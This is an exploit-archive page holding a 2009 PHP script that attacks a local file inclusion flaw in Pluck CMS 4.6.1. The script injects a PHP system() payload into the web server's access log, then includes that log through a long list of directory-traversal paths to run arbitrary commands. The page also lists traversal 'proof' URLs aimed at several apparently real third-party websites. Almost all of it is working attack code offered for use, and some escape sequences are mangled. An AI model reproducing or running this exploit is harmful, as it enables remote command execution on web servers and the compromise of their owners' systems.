[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Pluck CMS 4.6.1 (module_pages_site.php post) LFI Exploit
# Published : 2009-03-23
# Author : Alfons Luja
# Previous Title : Codice CMS 2 Remote SQL Command Execution Exploit
# Next Title : Syzygy CMS 0.3 LFI/SQL Command Injection Exploit


<?php 

/*
 pluck v 4.6.1 LFI exploit
 autor : Alfons Luja
 Vuln is in datamodulesblogmodule_pages_site.php 

  ...

      $includepage = 'blog_include.php';
      //Only set 'view post'-page if a post has been specified
      if (isset($_GET['post'])) {
	//Check if post exists, and include information
	   if (file_exists('data/settings/modules/blog/posts/'.$_GET['post'])) {
		include('data/settings/modules/blog/posts/'.$_GET['post']);
		$module_page['viewpost'] = $post_title;
	   }
      }
 ...

 Nothing to comment ;x
 Greetings: For all friends and obvious for me ;D

 pr00f: 
 http://www.kilgarvangaa.com//data/modules/blog/module_pages_site.php?post=../../../../../../../../../../bin/ls
 http://www.southtrewlogcabins.co.uk/data/modules/blog/module_pages_site.php?post=../../../../../../../../../../bin/ls
 http://www.seanhood.co.uk/data/modules/blog/module_pages_site.php?post=../../../../../../../../../../bin/ls
*/  
 

if($argc < 4) die("Use host path command [www.penatgon.gov /pluck ls l]n");

set_time_limit(0);
error_reporting(0);

$host = $argv[1];
$port = $argv[2];
$path = $argv[3];
$command = $argv[4];

//add something if not w00rking ;x

$shell = array(  
         "<?php echo(' e[Ho_trip ');system('$command');echo(' d34th_trip'); ?>",
         "../apache/logs/access.log",
         "../../apache/logs/access.log",
         "../../../apache/logs/access.log",
         "../../../../apache/logs/access.log",
         "../../../../../apache/logs/access.log",
         "../../../../../../apache/logs/access.log",
         "../../../../../../../apache/logs/access.log",
         "../../../../../../../../apache/logs/access.log",
         "../../../../../../../../../apache/logs/access.log",
         "../../../../../../../../../../apache/logs/access.log",
         "../../../../../../../../../../../apache/logs/access.log",
         "../var/log/httpd/access.log",
         "../../var/log/httpd/access.log",
         "../../../var/log/httpd/access.log",
         "../../../../var/log/httpd/access.log",
         "../../../../../var/log/httpd/access.log",
         "../../../../../../var/log/httpd/access.log",
         "../../../../../../../var/log/httpd/access.log",
         "../../../../../../../../var/log/httpd/access.log",
         "../../../../../../../../../var/log/httpd/access.log",
         "../../../../../../../../../../var/log/httpd/access.log",
         "../../../../../../../../../../../var/log/httpd/access.log",
         "../var/log/apache/access.log",
         "../../var/log/apache/access.log",
         "../../../var/log/apache/access.log",
         "../../../../var/log/apache/access.log",
         "../../../../../var/log/apache/access.log",
         "../../../../../../var/log/apache/access.log",
         "../../../../../../../var/log/apache/access.log",
         "../../../../../../../../var/log/apache/access.log",
         "../../../../../../../../../var/log/apache/access.log",
         "../../../../../../../../../../var/log/apache/access.log",
         "../../../../../../../../../../../var/log/apache/access.log",
         "../usr/local/apache2/logs/access.log",
         "../../usr/local/apache2/logs/access.log",
         "../../../usr/local/apache2/logs/access.log",
         "../../../../usr/local/apache2/logs/access.log",
         "../../../../../usr/local/apache2/logs/access.log",
         "../../../../../../usr/local/apache2/logs/access.log",
         "../../../../../../../usr/local/apache2/logs/access.log",
         "../../../../../../../../usr/local/apache2/logs/access.log",
         "../../../../../../../../../usr/local/apache2/logs/access.log",
         "../../../../../../../../../../usr/local/apache2/logs/access.log",
         "../../../../../../../../../../../usr/local/apache2/logs/access.log", 
   );
function _hdr($int){   //Mia?3o nie by?| file_get_contents
       
        global $shell,$host,$path;
        $header .= "GET /$host/$path/$shell[$int]  HTTP/1.1rn";
        $header .= "Host: $hostrn";
        $header .= "User-Agent: _echo [ru] (Win6.66; @)rn";
        $header .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8rn";
        $header .= "Accept-Language: en-us,en;q=0.5rn";
        $header .= "Accept-Encoding: gzip,deflatern";
        $header .= "Connection: closernrn";
        return $header;


}


function _inject($hosts,$ports){
    
           $hnd = fsockopen($hosts,$ports,$errno, $errstr, 30);
           if(!$hnd) die("Injection errr $errstrn");
           fwrite($hnd,_hdr(0));
           fclose($hnd);  


}

function _result($data){
 
          $ret = explode(' e[Ho_trip ',$data); 
            if($ret[1] != ""){
              for($i = 1;$i<count($ret);$i++){
               $ret_2 = explode(' d34th_trip',$ret[$i]);  
                   if($i - count($ret) == -1){
                     if($ret_2[0] != ""){
                        echo($ret_2[0]);
                     } else {
                        die("Exploit failed!!n");
                     }
               } 
              }    
               
            }

}

function _exploit($hosts,$paths){

        global $shell;
        $rets = "";
        $count = count($shell);

        for($i=1;$i<$count;$i++){
            
            $tab = file_get_contents("http://".$hosts."/".$paths."/data/modules/blog/module_pages_site.php?post=$shell[$i]");
           _result($tab);
  
        }
 
         
}
echo("---- pluck v 4.6.1 -----nn".
     "Autor: Alfons Lujan".
     "Target: $hostn".
     "Path: $pathn".
     "Port: $portn".
     "COM: $commandn".
     "Ex: poc.php www.target.com 80 pluck "dir"nn");

    _inject($host,$port);
    _exploit($host,$path);

?>

# www.Syue.com [2009-03-23]